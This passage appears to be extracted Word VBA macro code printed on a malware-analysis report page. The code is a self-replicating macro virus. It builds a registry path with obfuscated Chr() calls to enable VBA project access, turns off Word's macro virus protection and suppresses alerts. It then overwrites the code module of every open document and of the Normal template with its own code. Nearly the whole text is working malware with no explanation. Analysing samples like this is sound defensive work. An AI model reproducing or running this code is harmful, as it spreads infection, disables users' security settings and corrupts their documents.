& Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(65) & Chr(99) & Chr(99) & Chr(101) & Chr(115) & Chr(115) & Chr(86) & Chr(66) & Chr(79) & Chr(77)) <> 1& Then
.PrivateProfileString("", _
Chr(72) _
& _
Chr(75) _
& _
Chr(69) _
& _
Chr(89) _
& _
Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(65) & Chr(99) & Chr(99) & Chr(101) & Chr(115) & Chr(115) & Chr(86) & Chr(66) & Chr(79) & Chr(77)) = 1&
End _
If
End _
With
With _
Options
.VirusProtection _
= _
0
With _
.Application
.DisplayAlerts _
= _
wdAlertsNone
End _
With
End _
With
For _
Each _
fly _
In _
Documents
With _
fly
With _
.VBProject
With _
.vbcomponents("ThisDocument")
With _
.CodeModule
.deletelines _
1, _
.countoflines
.addfromstring _
Code
End _
With
End _
With
End _
With
End _
With
Next
With _
NormalTemplate
With _
.VBProject
With _
.vbcomponents("ThisDocument")
With _
.CodeModule
.deletelines _
1, _
.countoflines
.addfromstring _
Code
End _
With
End _
With
End _
With
End _
With
End _
Sub



















Attribute VB_Name = "ThisDocument1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.